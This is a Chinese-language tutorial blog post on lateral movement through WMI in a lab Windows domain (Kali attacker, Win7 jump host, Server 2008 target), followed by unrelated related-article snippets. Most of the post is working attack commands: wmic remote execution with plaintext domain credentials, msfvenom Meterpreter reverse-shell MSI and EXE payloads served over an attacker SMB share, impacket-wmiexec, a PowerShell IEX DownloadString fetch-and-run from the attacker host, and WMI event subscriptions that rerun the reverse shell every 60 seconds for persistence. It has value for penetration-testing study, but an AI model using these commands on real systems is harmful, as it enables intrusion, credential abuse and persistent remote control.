内网横向——利用WMI进行内网横向

文章目录

  • 一、WMI介绍
  • 二、常规利用方法
  • 三、常见利用工具
    • 3.1 wmiexec
    • 3.2 Invoke-WmiCommand
  • 四、WMI事件订阅的利用
    • 4.1 手动实现
    • 4.2 Sharp-WMIEvent

网络拓扑:
在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、WMI介绍

WMI(Windows Management Instrumentation,Windows管理规范)是一项核心的windows管理技术。从Windows 98开始,windows操作系统都支持WMI。用户可以通过WMI管理本地和远程计算机。Windows为远程传输WMI数据提供了两个可用的协议,即分布式组件对象模型(Distributed Component Object Model)和windows远程管理(Windows Remote Management,WinRM),使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等都可以远程执行。

利用WMI进行横向移动需要具备以下条件:1、远程主机的WMI服务为开启状态(默认开启);2、远程主机防火墙放行135端口,这是WMI管理的默认端口。

二、常规利用方法

在windows上可以通过wmic.exe和powershell Cmdlet来使用WMI数据和执行WMI方法。wmic.exe是一个与WMI进行交互的强大的命令行工具;windows powershell也提供了许多可以与WMI进行交互的Cmdlet,如Invoke-WmiMethod、Set-WmiInstance等。

1、通过WMIC查询远程主机(192.168.52.138)上允许的进程信息。

# 执行远程查询
wmic /node:192.168.52.138 /user:god\liukaifeng01 /password:hongrisec@2024. process list brief

在这里插入图片描述

2、通过调用Win32_Process.Create方法在远程主机上创建进程,启动CMD来执行系统命令。

# 创建远程进程
wmic /node:192.168.52.138 /user:god\liukaifeng01 /password:hongrisec@2024. process call create "cmd.exe /c ipconfig > c:\result.txt"

由于WMIC在执行命令时没有回显,因此可以将执行结果写入文件,然后建立IPC连接来远程读取。

# 建立IPC连接
net use \\192.168.52.138\ipc$ hongrisec@2024. /user:god\liukaifeng01
# 读取文件
type \\192.168.52.138\c$\result.txt

在这里插入图片描述

3、远程安装MSI文件
通过调用Win32_Prouduct.Install方法,可以控制远程主机安装恶意的MSI(Microsoft Installer)文件,从而获取其权限。

3.1 使用MSF生成一个恶意的MSI文件

为了收到反弹shell,这里给kali多加一个网卡,ip为192.168.52.1。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.1 lport=4444 -f msi -o reverse_tcp.msi

在这里插入图片描述

3.2 在kali上搭建SMB服务器,用于文件传输。

impacket-smbserver evilsmb /root/share -smb2support# 查看smb状态
systemctl status smb
# 关闭smb服务
systemctl stop smb

在这里插入图片描述
3.3 win7使用MSI让靶机(192.168.52.138)安装恶意的MSI文件。

wmic /node:192.168.52.138 /user:god\liukaifeng01 /password:hongrisec@2024. product call install PackageLocation="\\192.168.52.1\evilsmb\reverse_tcp.msi"# MSF监听
use exploit/multi/handler # msf自带的监听模块
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.1 # 攻击机IP
set lport 4444
exploit

在这里插入图片描述
在这里插入图片描述

三、常见利用工具

3.1 wmiexec

impacket项目中的wmiexec.py能够以全交互或半交互的方式,通过WMI在远程主机上执行命令。注意:该工具需要远程主机开放135和445端口,其中445端口用于传输命令执行的回显。

wmiexec.py要想在windows下直接使用,可以用PyInstaller打包成独立的exe文件。

kali执行下面的命令获取win7的交互式命令行:

impacket-wmiexec god/administrator:hongrisec@2024.@192.168.111.128
# impacket-wmiexec <domain>/<username>:<password>@<ip>

在这里插入图片描述

win7执行下面的命令获取win server 2008的交互式命令行:

wmiexec.exe god/liukaifeng01:hongrisec@2024.@192.168.52.138

在这里插入图片描述

3.2 Invoke-WmiCommand

Invoke-WmiCommand.psl是powersploit项目中的一个脚本,可以通过powershell调用WMI来远程执行命令。

# 远程加载Invoke-wmicommand脚本
IEX(New-Object Net.Webclient).DownloadString('http://192.168.111.0:9999/Invoke-WmiCommand.ps1')
# 指定远程系统用户名
$User = "god\liukaifeng01"
# 指定用户的密码
$Password = ConvertTo-SecureString -String "hongrisec@2024." -AsPlainText -Force
# 将用户名和密码整合,以便导入Credential
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password
# 指定远程主机和要执行的命令
$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName "192.168.52.138" 
# 输出命令执行回显
$Remote.PayloadOutput

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

直接复制,可能会影响命令执行。

四、WMI事件订阅的利用

WMI提供了一个强大的事件处理系统,几乎可以用来对操作系统上发生的任何事件做出响应。例如,当创建某进程时,通过WMI事件订阅来执行预先设置的脚本。其中,触发时间的具体条件被称为“事件消费者”,如用户登录、新进程创建等;对指定事件发生做出的响应被称为“事件消费者”,包括一系列具体的操作,如运行脚本、记录日志、发送邮件等。在部署事件时,需要分别构建Filter和Consumer两部分,并将二者绑定在一起。

测试人员可以使用WMI的功能在远程主机上部署永久事件订阅,并在特定事件发生时执行任意代码或系统命令。使用WMI事件消费类的ActiveScriptEventConsumerCommandLineEventConsumer,可以在远程主机上执行任何攻击载荷。该技术主要用来在目标系统上完成权限持久化,也可以用于横向移动。

4.1 手动实现

1、整合PSCredential,用于后续过程的认证。

# 指定远程系统用户名
$User = "god\liukaifeng01"
# 指定用户的密码
$Password = "hongrisec@2024."
$SecurePassword = $Password | ConvertTo-SecureString -AsPlainText -Force
# 将用户名和密码整合,以便导入Credential
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$SecurePassword

在这里插入图片描述

2、设置攻击目标和其他参数

$GlobalArgs = @{}
$ComputerName = "192.168.52.138"
$GlobalArgs['Credential'] = $Credential
$GlobalArgs['ComputerName'] = $ComputerName

在这里插入图片描述

3、在远程主机(192.1168.52.138)上部署Filter事件过滤器,用于查询svchost.exe进程的产生。由于WMI所有的事件过滤器都被存储在ROOT\subscription:__EventFilter对象的实例中,因此通过Set-WmiInstance Cmdlet创建一个__EventFilter类的实例即可。

$EventFilterArgs = @{EventNamespace = 'root/cimv2'Name = "TestFilter"Query = "SELECT * FROM Win32_ProcessStartTrace where processname = 'svchost.exe'"QueryLanguage = 'WQL'
}
$EventFilter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $EventFilterArgs @GlobalArgs

shift+enter结束多行命令输入。

在这里插入图片描述

4、在远程主机上(192.1168.52.138)部署一个名为 TestConsumer 的事件消费者,创建事件消费类 CommandLineEventConsumer 的实例,在指定事件发生时执行系统命令。

$CommandLineEventConsumerArgs = @{Name = "TestConsumer"CommandLineTemplate = "C:\Windows\System32\cmd.exe /c calc.exe"
} 
$EventConsumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $CommandLineEventConsumerArgs @GlobalArgs

在这里插入图片描述

5、将创建的事件过滤器和事件消费者绑定在一起。

$FilterConsumerBindingArgs = @{Filter = $EventFilterConsumer = $EventConsumer
}
$FilterConsumerBinding = Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $FilterConsumerBindingArgs @GlobalArgs

在这里插入图片描述

以上所有命令均是在win7上执行。

在靶机上用process monitor去查看进程树,看是否存在calc.exe
在这里插入图片描述

执行完脚本,也可以通过一些命令去查看创建的实例,已确定脚本执行成功:

# 查看创建的事件过滤器的实例
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

在这里插入图片描述

# 查看创建的事件消费者的实例
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

在这里插入图片描述

# 查看事件绑定,可以从 __PATH 属性中看到哪个 Filter 和 Consumer 用于 WMI 事件
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

在这里插入图片描述

4.2 Sharp-WMIEvent

1、在kai中搭建SMB服务器,并将反弹shell的脚本放在共享目录中。

# 生成反弹shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.1 lport=4444 -f exe -o reverse_tcp.exe# 搭建SMB服务器
impacket-smbserver evilsmb /root/share -smb2support

在这里插入图片描述

2、在win7上执行以下命令,运行Sharp-WMIEvent

# 在win7跳板机上运行
# 导入模块
import-module .\Sharp-WMIEvent.ps1# 在靶机上部署一个随机重命名的永久事件订阅,每隔60s执行一次SMB共享中的反弹shell
Sharp-WMIEvent -Trigger Interval -IntervalPeriod 60 -ComputerName 192.168.52.138 -Username god\liukaifeng01 -Password hongrisec@2024. -Command "cmd.exe /c \\192.168.52.1\evilsmb\reverse_tcp.exe"# kali设置监听
use exploit/multi/handler # msf自带的监听模块
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.1
set lport 4444
exploit

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/51427.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

业务记录:处理动态表头的CSV/EXCEL文件

业务描述&#xff1a;传入一个动态表头的CSV文件&#xff0c;解析CSV&#xff0c;并保存入库。 CSV文件的表头是不确定的&#xff0c;即顺序和字段个数不确定&#xff0c;以及表头是中文字段。 例如&#xff1a; 为了顺利解析CSV文件&#xff0c;前端需要传入对应的字段名和顺…

.NET Core 命令大全

目录 1. 基本命令 2. 项目管理命令 3. 测试和调试命令 4. 包管理命令 5. 工具和扩展命令 结语 .NET Core 是一个跨平台、开源的开发平台&#xff0c;用于构建各种应用程序。为了方便开发者进行操作&#xff0c;.NET Core 提供了一系列的命令行工具。这篇文章将详细介绍这…

如何将anaconda的根环境复制到新环境

anaconda将根环境复制到新环境 在Anaconda中&#xff0c;您可以使用conda create命令来复制根环境到一个新的环境。以下是一个命令示例&#xff1a; conda create --name new_env --clone root 这里new_env是新环境的名字&#xff0c;您可以根据需要将其更改为您想要的名字。…

前端数据处理

数据处理 多字段&#xff08;数字类型&#xff09;排序 let arr [{name: jim, math: 85, english: 66, chinese: 36},{name: tom, math: 78, english: 70, chinese: 87},{name: lilei, math: 78, english: 89, chinese: 36},{name: alice, math: 90, english: 20, chinese: …

docker安装mysql遇到的问题

1、3306端口被占用 Error starting userland proxy: listen tcp4 0.0.0.0:3306: bind: address already https://blog.csdn.net/qq_42680327/article/details/136851627 2、mysql已经被占用 docker: Error response from daemon: Conflict. The container name “/mysql“ is…

使用SpringBoot集成Shardingjdbc介绍、应用场景和示例代码

概述 Spring Boot集成Sharding JDBC可以帮助实现MySQL数据库的分库分表操作&#xff0c;使得应用能够轻松处理大规模数据和高并发场景。Sharding JDBC通过透明的分库分表策略&#xff0c;将数据分布到多个数据库实例和数据表中&#xff0c;从而提高数据库的扩展性和性能。 应…

axure制作切换栏--动态面板的应用

先看下效果&#xff1a;点击上面的切换栏 切换到西游记栏目&#xff1a; 切换到水浒传栏目&#xff1a; 上述两个图片比对可以发现&#xff0c;在点击切换栏的时候&#xff0c;里面的内容以及切换栏的下面蓝色横线也会发生对应的变化。这里涉及到两个地方的变化&#xff0c;就…

Golang 知识结构图

总结Go的入门知识结构&#xff0c;如下图所示&#xff1a;

关于map的内存和时间复杂度内存占用

关于map的内存和时间复杂度&#xff08;map尽量别碰暴力遍历&#xff09; 内存占用&#xff1a; map中每个元素包含一个键和一个值。键和值的类型可以是任意可比较的数据类型。 内存占用取决于键和值的大小以及map中元素的数量。 对于固定大小的键和值类型&#xff0c;map的内…

图形/视图结构的三个坐标系

图形/视图结构的三个坐标系分别为视图结构系物理结构系&#xff0c;场景坐标系&#xff0c;图形项坐标系。 本文记录实践三个坐标系及视图与场景坐标转换&#xff0c;通过事件槽来显示出来的过程。 自定义1个View视图组件&#xff0c;其中扩展了鼠标点击、鼠标移动的事件&…

详细介绍仿函数

仿函数&#xff08;Functor&#xff09;是C中的一种可调用对象&#xff08;Callable Object&#xff09;&#xff0c;也是一种重载了函数调用运算符&#xff08;operator()&#xff09;的类或结构体。 仿函数可以像函数一样被调用&#xff0c;可以带参数&#xff0c;可以返回值…

Golang | Leetcode Golang题解之第297题二叉树的序列化与反序列化

题目&#xff1a; 题解&#xff1a; type Codec struct{}func Constructor() (_ Codec) {return }func (c Codec) serialize(root *TreeNode) string {if root nil {return "X"}left : "(" c.serialize(root.Left) ")"right : "("…

路由学习属于OSI模型的哪一层

路由学习主要发生在OSI&#xff08;开放系统互连&#xff09;模型的第三层&#xff0c;即网络层。在OSI模型中&#xff0c;每一层都有其特定的功能和责任&#xff0c;而网络层的主要职责是管理网络中的数据通信&#xff0c;包括数据包的转发和路由选择。 具体来说&#xff0c;…

前端渲染模式

渲染的概念 在Web开发中&#xff0c;渲染&#xff08;Rendering&#xff09;是一个核心概念&#xff0c;指的是将应用程序的数据&#xff08;data&#xff09;与模板&#xff08;template&#xff09;结合&#xff0c;生成最终的HTML页面&#xff0c;这个页面随后会被浏览器解析…

主宰生物进化的 “魔咒” —— 制约生物在特殊环境下进化方式的线索

一些神秘的法则制约着生物在特殊环境下的进化方式。它们还为动物将如何适应气候变暖提供了线索。 一些奇特的进化现象 一艘装满大象和老鼠的 “诺亚方舟” 搁浅在一座偏远的小岛上。动物们都幸存下来并繁衍后代。但是&#xff0c;随着世代相传&#xff0c;奇怪的事情发生了&a…

【基础篇】Docker 概览 ONE

嗨&#xff0c;大家好&#xff01;我是小竹笋&#xff0c;一名热爱创作的工程师。今天我将带领大家一起踏上探索 Docker 的奇妙之旅。我们先从 Docker 的历史和发展说起&#xff0c;然后再看看 Docker 和虚拟机之间的区别&#xff0c;最后了解一下 Docker 在各行各业的应用情况…

环境配置—批量删除时提示/usr/bin/rm: Argument list too long问题

文章目录 1. 背景介绍2. 问题原因3. 解决方案3.1 分批删除文件3.2 使用 find 命令直接删除3.3 增加系统参数限制3.4 使用循环删除 4. 结论 1. 背景介绍 在Linux系统中&#xff0c;rm 命令是删除文件和目录的常用工具。然而&#xff0c;当需要删除大量文件时&#xff0c;可能会…

python脚本,识别pdf数据,转换成表格形式

可以使用Python库来识别PDF文件并将其转换为表格形式。下面是一个示例脚本&#xff0c;使用了tabula-py库来进行PDF数据提取和转换操作。 首先&#xff0c;安装tabula-py库。可以使用以下命令来安装&#xff1a; pip install tabula-py然后&#xff0c;使用以下代码来实现PDF…

【论文10】复现代码tips

一、准备工作 1.创建一个虚拟环境 conda create --name drgcnn38 python=3.8.18 2.激活虚拟环境 conda activate drgcnn38 注意事项 在Pycharm中终端(terminal)显示PS而不是虚拟环境base 问题如下所示 解决方法:shell路径改成cmd.exe 重启终端显示虚拟环境 3.安装torch …

Dav_笔记11:SQL Tuning Overview-sql调优 之 3

自动SQL调整功能 由于手动SQL调优过程给应用程序开发人员带来了许多挑战&#xff0c;因此Oracle调优过程已通过Oracle数据库的自动SQL调优功能实现自动化。这些功能旨在同样适用于OLTP和数据仓库类型的应用程序&#xff1a; ■ADDM ■SQL Tuning Advisor ■SQL调整集 ■SQ…